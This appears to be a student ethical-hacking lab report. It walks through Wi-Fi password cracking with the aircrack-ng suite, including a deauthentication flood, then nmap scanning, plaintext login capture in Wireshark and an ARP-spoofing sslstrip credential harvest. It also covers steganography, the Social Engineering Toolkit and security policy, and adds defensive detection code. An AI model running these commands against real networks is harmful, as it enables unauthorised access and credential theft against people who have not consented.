
Task 1:

Run VMware Workstation and click on the Create a New Virtual Machine option.
Kali Linux:
Step 1: - Select the Kali Linux image file under Installer disc image file and click Next.

Step 2: - In this step, select the guest type as Linux and also select the version of the operating
system.
Step 3: - Give the name of the virtual machine and the location where it is to be saved.
Step 4: - Select the size of the virtual hard disk and choose whether it should be split into
multiple files or kept as a single file.
Step 5: - The virtual machine is now ready to be created. Click Finish to run it.
Step 6: - In the Kali Linux installer menu, select Graphical install to install Kali Linux.

Step 7: - Select the language to be used during the installation process.

Step 8: - Configure the username for the system and click Continue.
Step 9: - Set the password for the system.

Step 10: - If any additional software is wanted, it can be selected for installation in this step.
Step 11: - If we want to install the GRUB boot loader, click Yes, otherwise click No, and then
click Continue.
Step 12: - Select the device on which the GRUB boot loader is to be installed and click
Continue.

Step 13: - As we can see, the system is now ready to use.


Windows XP: -
Step 1: - Run VMware Workstation and import the Windows XP OVA file. Select the location
where the virtual machine is to be saved and click Import.
Step 2: - The virtual machine is now importing; wait until the import finishes.

Step 3: - The machine is now ready to operate.


TASK - 2

A) WIFI Hacking:

● First, find the name of the wireless interface with the command below.
○ #iwconfig
● Enable monitor mode on the Wi-Fi interface with the command below:
○ #airmon-ng start <interface>
● As we can see, the Wi-Fi interface now observes all traffic received on the wireless
channel.
● Capture the wireless traffic with the following command:
○ #airodump-ng <MonitorModeInterface>

● All available ESSIDs are now shown.


● Select the ESSID whose credentials we want to recover and write the observed data to a
file with the command below:
○ #airodump-ng --bssid <enter bssid> -c 2 --write <capturefilename> wlan0mon

● De-authenticate the devices that are connected:
○ #aireplay-ng --deauth 100 -a <Macaddress> <MonitorModeInterface>


● Crack the password with aircrack-ng, using a wordlist, with the command below:
○ #aircrack-ng <capturefilename> -w wordlist

Hence we have recovered the password of the selected BSSID and gained access to the
network.
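The de-authentication step above is exactly what a wireless intrusion detection system watches for on the defender's side. The following is an added example written for this report (my own code, not part of the original and not from the aircrack-ng suite): it reads a list of 802.11 management-frame summaries, constructed here with field names of my own choosing, and raises one alert per BSSID when a burst of deauthentication or disassociation frames exceeds a threshold inside a sliding time window. The window length and threshold are assumptions to be tuned per network.

```python
# Added example for this report (my own code, not from aircrack-ng): detect a
# deauthentication flood from a stream of 802.11 management-frame summaries.
from collections import defaultdict, deque

DEAUTH = 0x0C     # 802.11 management subtype 12: deauthentication
DISASSOC = 0x0A   # subtype 10: disassociation
BEACON = 0x08     # subtype 8: beacon (benign background traffic)
BROADCAST = 'FF:FF:FF:FF:FF:FF'


def detect_deauth_flood(frames, window_s=5.0, threshold=20):
    """Return [(bssid, window_start_ts, count)] with one alert per BSSID.

    frames: iterable of dicts with keys 'ts' (seconds), 'subtype', 'bssid',
    'dst' (field names are an assumption of this example). An alert fires the
    first time more than `threshold` deauth/disassoc frames for one BSSID fall
    inside any `window_s` second window.
    """
    recent = defaultdict(deque)   # bssid -> timestamps of recent deauths
    alerted = set()
    alerts = []
    for frame in sorted(frames, key=lambda f: f['ts']):
        if frame['subtype'] not in (DEAUTH, DISASSOC):
            continue
        window = recent[frame['bssid']]
        window.append(frame['ts'])
        while window and frame['ts'] - window[0] > window_s:
            window.popleft()          # drop frames older than the window
        if len(window) > threshold and frame['bssid'] not in alerted:
            alerted.add(frame['bssid'])
            alerts.append((frame['bssid'], window[0], len(window)))
    return alerts


def constructed_capture():
    """Synthetic 20 s capture: beacons, two normal deauths, one flood."""
    ap = 'AA:BB:CC:DD:EE:01'       # constructed BSSIDs
    other_ap = 'AA:BB:CC:DD:EE:02'
    frames = [{'ts': i * 0.1, 'subtype': BEACON, 'bssid': ap, 'dst': BROADCAST}
              for i in range(200)]
    # a legitimate AP occasionally deauthenticates a single client
    frames.append({'ts': 3.0, 'subtype': DEAUTH, 'bssid': other_ap, 'dst': '11:22:33:44:55:66'})
    frames.append({'ts': 15.0, 'subtype': DEAUTH, 'bssid': other_ap, 'dst': '11:22:33:44:55:66'})
    # a flood: 100 broadcast deauths 50 ms apart, spoofed as coming from the AP
    frames += [{'ts': 8.0 + i * 0.05, 'subtype': DEAUTH, 'bssid': ap, 'dst': BROADCAST}
               for i in range(100)]
    return frames


if __name__ == '__main__':
    for bssid, start, count in detect_deauth_flood(constructed_capture()):
        print('deauth flood from %s: %d frames starting at t=%.2fs' % (bssid, count, start))
```

A real deployment would feed the function frame summaries from a monitor-mode capture. On the mitigation side, enabling 802.11w Protected Management Frames on the access point makes clients reject deauthentication frames that are not cryptographically protected, which is what takes the sting out of this step.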

B) Scanning
Having entered the network, we run various scans to find vulnerable devices.
● To list all the open ports and services of all the devices in the network, use the following
command:
#nmap -v 192.168.69.*

● We found that the vulnerable target is 192.168.69.130, so let's scan it.


After the scan completes, we see that there are numerous open ports, and they may be
vulnerable.

● The screenshot below shows the details of the FTP port (21).


We found that the FTP service is vulnerable to anonymous login: we can enter FTP with the
username anonymous and the password anonymous.

● Use the command below to scan all the ports of a device:
# nmap -p- 192.168.69.130

● An aggressive scan can be done with the command below:
# nmap -A 192.168.69.130
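Scans like the nmap commands above leave a recognisable pattern in firewall logs: one source touching many ports on one host (the `-p-` scan) or one port on many hosts (the `192.168.69.*` sweep). The code below is an added example written for this report, not nmap's own output format or any project's code; it parses a handful of constructed iptables-style log lines and flags both patterns. The thresholds are assumptions.

```python
# Added example for this report (my own code, not nmap's): spot port scans and
# host sweeps in iptables-style connection log lines.
import re
from collections import defaultdict

# Matches the fields we need from a constructed iptables-style line.
LOG_RE = re.compile(r'SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?DPT=(?P<dpt>\d+)')


def parse_line(line):
    """Return {'src', 'dst', 'dpt'} or None for lines that do not match."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return {'src': m.group('src'), 'dst': m.group('dst'), 'dpt': int(m.group('dpt'))}


def detect_scans(lines, port_threshold=15, host_threshold=10):
    """Return {'vertical': {(src, dst): n_ports}, 'horizontal': {(src, port): n_hosts}}.

    A vertical scan (nmap -p- host) is one source probing many ports on one host;
    a horizontal sweep (nmap on a whole /24) is one source probing one port on
    many hosts. Thresholds are assumptions; production code would also bound
    the counts by a time window.
    """
    ports_by_pair = defaultdict(set)
    hosts_by_port = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ports_by_pair[(rec['src'], rec['dst'])].add(rec['dpt'])
        hosts_by_port[(rec['src'], rec['dpt'])].add(rec['dst'])
    vertical = {k: len(v) for k, v in ports_by_pair.items() if len(v) >= port_threshold}
    horizontal = {k: len(v) for k, v in hosts_by_port.items() if len(v) >= host_threshold}
    return {'vertical': vertical, 'horizontal': horizontal}


def constructed_log():
    """Synthetic log: one scanner, one normal client, one unrelated line."""
    fmt = 'Jan 10 10:00:{:02d} fw kernel: IN=eth0 SRC={} DST={} PROTO=TCP SPT=4444 DPT={} SYN'
    lines = []
    # normal client talking to the web and FTP ports on the target
    for port in (80, 443, 21, 80):
        lines.append(fmt.format(1, '192.168.69.7', '192.168.69.130', port))
    # vertical scan: 40 ports on the target host from the report
    for port in range(1000, 1040):
        lines.append(fmt.format(2, '192.168.69.5', '192.168.69.130', port))
    # horizontal sweep: port 22 on twenty hosts of the /24
    for host in range(1, 21):
        lines.append(fmt.format(3, '192.168.69.5', '192.168.69.%d' % host, 22))
    lines.append('Jan 10 10:00:04 fw sshd[123]: Accepted publickey for ops')  # no match
    return lines


if __name__ == '__main__':
    result = detect_scans(constructed_log())
    for (src, dst), n in result['vertical'].items():
        print('vertical scan: %s -> %s, %d distinct ports' % (src, dst, n))
    for (src, port), n in result['horizontal'].items():
        print('sweep: %s -> port %d on %d hosts' % (src, port, n))
```

The distinct-port and distinct-host counts are what matter, not the raw line count: a busy legitimate client generates many lines against a few ports, which is why the normal client in the sample stays below both thresholds.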

C) Man-in-the-middle Attack
Capturing HTTP traffic with Wireshark.

● First, open Wireshark on the attacker's machine.


● Choose the interface whose packets we want to capture.
● As we can see in the screenshot, all incoming and outgoing packets are being collected in
Wireshark.

● In the browser's address bar type http://testphp.vulnweb.com/login.php and press Enter, then
log in with the username admin and the password admin.
● In Wireshark, select the login packet whose username and password we want to see in plain
text:
❖ Select the packet → right click → Follow → TCP Stream; the username and
password are shown in plain text.

D) Attack for HTTPS

● To perform MITM against HTTPS traffic with Wireshark, apply the filter "tcp.port==443";
with this filter we can read the SSL keys and SSL traffic.
● We can also perform SSL strip against the target.
First, enable port forwarding on the attacker's machine.

Now open a terminal and run the command shown in the screenshot.

Look up the default gateway in the routing table:

Use spoofing to change the gateway of the target machine.

Now run SSL strip on port 8080 with the command below:

sslstrip -l 8080
Now check the logs and look for the login ID and password used by the target.

Prevention Techniques

1. Use the latest browser with its security features enabled, which makes it more difficult for
an attacker to carry out the attack.
2. Use add-ons like "HTTPS Everywhere", which alert you every time you visit a website as to
whether or not it is using a secure SSL connection.
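The Wireshark and SSL-strip steps above point at two things a defender can check from the traffic itself: whether a login form sent its credentials over plain HTTP, and whether the server sends a Strict-Transport-Security (HSTS) header, which tells a browser that has already seen the site over HTTPS to refuse the plain-http downgrade an SSL-strip proxy depends on. The following added example (my own code, not from the report or from Wireshark) does both on constructed data: a request in the shape Follow TCP Stream displays, with the form field names `uname` and `pass` as assumptions, and two constructed sets of response headers.

```python
# Added example for this report (my own code, not Wireshark's): find credentials
# sent in clear text and check whether a server enables HSTS.
from urllib.parse import parse_qs

CREDENTIAL_FIELDS = {'user', 'username', 'uname', 'login', 'email',
                     'pass', 'password', 'passwd', 'pwd'}


def find_cleartext_credentials(raw_request):
    """Return {field: value} for credential-like form fields in one HTTP request
    given as text (the shape Follow TCP Stream shows), or {} if there are none."""
    head, _, body = raw_request.partition('\r\n\r\n')
    request_line, *header_lines = head.split('\r\n')
    method, target, _version = request_line.split(' ', 2)
    headers = {}
    for line in header_lines:
        if ':' in line:
            name, value = line.split(':', 1)
            headers[name.strip().lower()] = value.strip()
    fields = {}
    content_type = headers.get('content-type', '')
    if method == 'POST' and content_type.startswith('application/x-www-form-urlencoded'):
        fields = parse_qs(body)                     # form body
    elif '?' in target:
        fields = parse_qs(target.split('?', 1)[1])  # query string (GET forms)
    return {name: values[0] for name, values in fields.items()
            if name.lower() in CREDENTIAL_FIELDS}


def hsts_status(response_headers, min_max_age=31536000):
    """Parse Strict-Transport-Security from a response's header dict.

    A browser that has seen this header over HTTPS refuses to load the site over
    plain http:// for max-age seconds, which defeats an SSL-strip downgrade on
    later visits. 'strong' means max-age is at least one year (an assumed bar)."""
    value = next((v for k, v in response_headers.items()
                  if k.lower() == 'strict-transport-security'), None)
    status = {'enabled': value is not None, 'max_age': 0,
              'include_subdomains': False, 'strong': False}
    if value is None:
        return status
    for directive in value.split(';'):
        d = directive.strip()
        if d.lower().startswith('max-age='):
            try:
                status['max_age'] = int(d.split('=', 1)[1].strip().strip('"'))
            except ValueError:
                pass
        elif d.lower() == 'includesubdomains':
            status['include_subdomains'] = True
    status['strong'] = status['max_age'] >= min_max_age
    return status


# Constructed request as the login step above would put it on the wire; the
# field names uname/pass are an assumption.
SAMPLE_REQUEST = (
    'POST /login.php HTTP/1.1\r\n'
    'Host: testphp.vulnweb.com\r\n'
    'Content-Type: application/x-www-form-urlencoded\r\n'
    'Content-Length: 22\r\n'
    '\r\n'
    'uname=admin&pass=admin'
)
# Constructed response headers: one site with HSTS, one without.
HSTS_RESPONSE = {'Content-Type': 'text/html',
                 'Strict-Transport-Security': 'max-age=63072000; includeSubDomains'}
PLAIN_RESPONSE = {'Content-Type': 'text/html'}

if __name__ == '__main__':
    print('credentials in clear text:', find_cleartext_credentials(SAMPLE_REQUEST))
    print('HSTS on hardened site:', hsts_status(HSTS_RESPONSE))
    print('HSTS on plain site:', hsts_status(PLAIN_RESPONSE))
```

HSTS only helps a browser that has visited the site over HTTPS at least once, which is why the browser-side add-on the prevention list recommends and the server-side header complement each other rather than replace each other.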

E) Steganography
Steganography is a method of keeping information secret by hiding it inside an audio, video or
image file.

● First, open a terminal and, if the stegosuite tool is not already on the machine, install it with
the command below.
#sudo apt install stegosuite

Now run the stegosuite tool with the stegosuite command.
Now enter the password and the data to be embedded; clicking Embed hides the data in the
image file, and the resulting image file is saved on the system.
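To show what hiding data inside an image file means at the byte level, here is an added example (my own code, not stegosuite's) of the simplest form, least-significant-bit embedding: each bit of the payload replaces the lowest bit of one 8-bit sample, so no sample changes by more than one unit and the picture looks the same. The cover is a constructed 64x64 grayscale gradient standing in for an image's pixel bytes, and the 4-byte length header is my own framing choice; the password protection stegosuite adds is not reproduced.

```python
# Added example for this report (my own code, not stegosuite's): least-significant-
# bit steganography on a sequence of 8-bit samples standing in for image pixels.
import struct


def _bits(data):
    """Yield the bits of a bytes object, most significant bit first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(cover, payload):
    """Return a copy of cover with payload hidden in its least significant bits.

    Framing (my choice): a 4-byte big-endian length, then the payload bytes.
    One bit goes into each sample, so each sample changes by at most 1."""
    framed = struct.pack('>I', len(payload)) + payload
    if len(framed) * 8 > len(cover):
        raise ValueError('cover has %d samples, payload needs %d'
                         % (len(cover), len(framed) * 8))
    stego = bytearray(cover)
    for index, bit in enumerate(_bits(framed)):
        stego[index] = (stego[index] & 0xFE) | bit   # clear LSB, set it to bit
    return stego


def lsb_extract(stego):
    """Recover the payload written by lsb_embed."""
    def read_bytes(first_sample, count):
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[first_sample + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)

    (length,) = struct.unpack('>I', read_bytes(0, 4))
    if 32 + length * 8 > len(stego):
        raise ValueError('length header exceeds the available samples')
    return read_bytes(32, length)


def max_sample_change(cover, stego):
    """Largest per-sample difference, i.e. how visible the embedding is."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def constructed_cover(samples=64 * 64):
    """Synthetic 64x64 grayscale gradient in place of a real image's bytes."""
    return bytes((i * 7 + (i // 64) * 3) & 0xFF for i in range(samples))


if __name__ == '__main__':
    cover = constructed_cover()
    secret = b'meet at noon'
    stego = lsb_embed(cover, secret)
    print('recovered:', lsb_extract(stego))
    print('max change per sample:', max_sample_change(cover, stego))
```

The bit plane being overwritten is close to random noise in a real photograph, which is why the change is invisible to the eye and also why the defender's detection tool is a statistical test on that plane rather than a visual inspection.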

Task 3
Social Engineering & its toolkit
Social engineering is a term that encompasses a broad range and quantity of malicious
activity. Pretexting, baiting, phishing, tailgating and quid pro quo are the major attack
categories that social engineers use to target their victims. The Social Engineer Toolkit works
together with Metasploit and enables client-side attacks for harvesting credentials. Generally,
the attacker prepares a fake login page that is an exact mirror image of the real website's
login page, and the link to this fake page is shared with the target. The victim is not able to
distinguish the fake login page from the real one, so they enter their credentials, which are
stored in the attacker's database. The attacker can then misuse the illegally stored credentials
for their own personal benefit.
The Social Engineering Toolkit is an open-source penetration-testing framework with many
custom attack vectors that make an attack believable within a fraction of the time. It supports
multiple platforms (UNIX, Linux and Windows), integrates with third-party modules and
allows many tweaks through its configuration menus. It also includes the Fast-Track
penetration testing platform. Its social engineering attacks offer options such as website
attacks, mass mailing, the PowerShell attack vector, QR code attacks, Arduino-based attacks,
spear-phishing attacks and the infectious media generator. These attack categories are carried
out against groups, organizations and their staff members, as well as individuals,
stakeholders and other entities.
Categories for Social Engineering Attacks
Pretexting, baiting, phishing, tailgating and quid pro quo are the major attack categories that
social engineers use to target their victims. Phishing is the most widely used category of
social engineering; it is used to collect personal information such as name, address and social
security number. Attackers use misleading links that redirect victims to insecure websites,
and they generally distribute these malicious and misleading links by email. Pretexting is
another form of social engineering attack in which attackers craft convincing content based
on fabricated scenarios to steal victims' personal information. Phishing attacks exploit urgency
and fear to their advantage, whereas pretexting attacks rely on creating a false sense of trust.
Baiting attacks are not limited to online schemes and also exploit human curiosity. Tailgating,
also known as piggybacking, is when an attacker follows an authenticated employee to gain
their access.
https://www.tripwire.com/state-of-security/security-awareness/5-social-engineering-attacks-to-watch-out-for/
Security Policy Awareness Guidance
Security awareness is a proactive method for dealing with offline and online threats in the
workplace. A security policy ensures a consistent body of critical information and the
procedures to secure it from internal and external threats. Security policy awareness
guidance helps employees understand actual cyber hygiene along with the associated security
risks, in particular the identification of and response to cyber-attacks, which are most often
encountered through the web and email. While designing security policy awareness guidance,
do not forget to cover the properties below, which relate to enforcement of the policy, its
applicability and its implementation through system administration procedures.
Your security policy awareness guidance should have five key elements: authenticity,
integrity, confidentiality, non-repudiation and availability. Information and data assets should
be confined to the individuals licensed to use them and not disclosed to other people; this
ensures that information is accessible only to the employees or users authorized to access it.
Integrity ensures the maintenance, trustworthiness and accuracy of data. Availability is the
assurance that the system is responsible for storing, processing and delivering data that is
accessible only to authorized customers.
https://info-savvy.com/top-5-key-elements-of-an-information-security/
An effective security policy and system should have four core elements: reaction,
verification, protection and detection. Protection is a physical barrier and the first layer of
defence against trespass and intrusion; it works as a physical and visual deterrent to cyber
attackers and criminals. An information security policy governs the data protection that every
organization and individual requires. The major key elements of an information security
policy are purpose, scope, objective, access control policy and authorization, data
classification, security awareness sessions, data support and operations, personnel duties,
rights and responsibilities, and references to relevant legislation.
The main reason for designing a security policy is to establish an effective mechanism to
secure information so that critical data cannot be misused. This helps maintain the
organization's reputation in terms of its legal and ethical responsibilities. An effective
information security policy covers facilities, technology, users, programs, systems,
information and other supporting infrastructure. The policy needs to be highly concerned
with strategy and security, which helps ensure quality, workability and completeness. Data
and information assets should be confined to the customers who have authorized access and
not disclosed to identities that have no relevance to them. Data integrity helps keep
information accurate and complete and IT (Information Technology) systems operational.
Information or data sets are made available, based on customer authorization, whenever they
are required.
Access and authorization control is required because an organization has many people and
stakeholders from various domains. If everyone has access to critical information, it becomes
highly dangerous to the organization's working infrastructure: an employee might share
critical information with a competitor or ill-wisher of the organization, which is a data breach
or security breach scenario in which critical information is shared with others. A junior staff
member is not capable of taking such decisions efficiently, whereas senior management has
the capability, knowledge and authority to decide with whom and what type of information
can be shared in the organization. Data is classified into three major categories: the high-risk
class, the confidential class and the public class. The high-risk class contains data protected
by federal and state legislation, together with personnel, payroll and financial data. Federal
and state legislation requires the implementation of FERPA, HIPAA and the Data Protection
Act. Personnel data carries privacy requirements. Confidential information is not maintained
and protected as required by law but according to the data owner's judgment, and public-class
information can be freely shared and distributed.
Data protection, data backup and data migration are the three major supporting operations for
an organization. Sharing the IT security policy with staff members and guiding them is one
of the most critical steps. For this, training and awareness sessions should be conducted so
that every member of the organization understands the importance of data security and
information security. These sessions also cover data deletion, data collection, data
utilization, records management, privacy, correct use of social networking, confidentiality,
data quality maintenance and proper use of information technology. An information security
policy covers intrusion detection systems, remote working procedures, employee
requirements, virus protection mechanisms, technical guidelines, consequences of
non-compliance, physical IT security and the necessary support for documents stored as soft
copy and hard copy.
https://resources.infosecinstitute.com/topic/key-elements-information-security-policy/
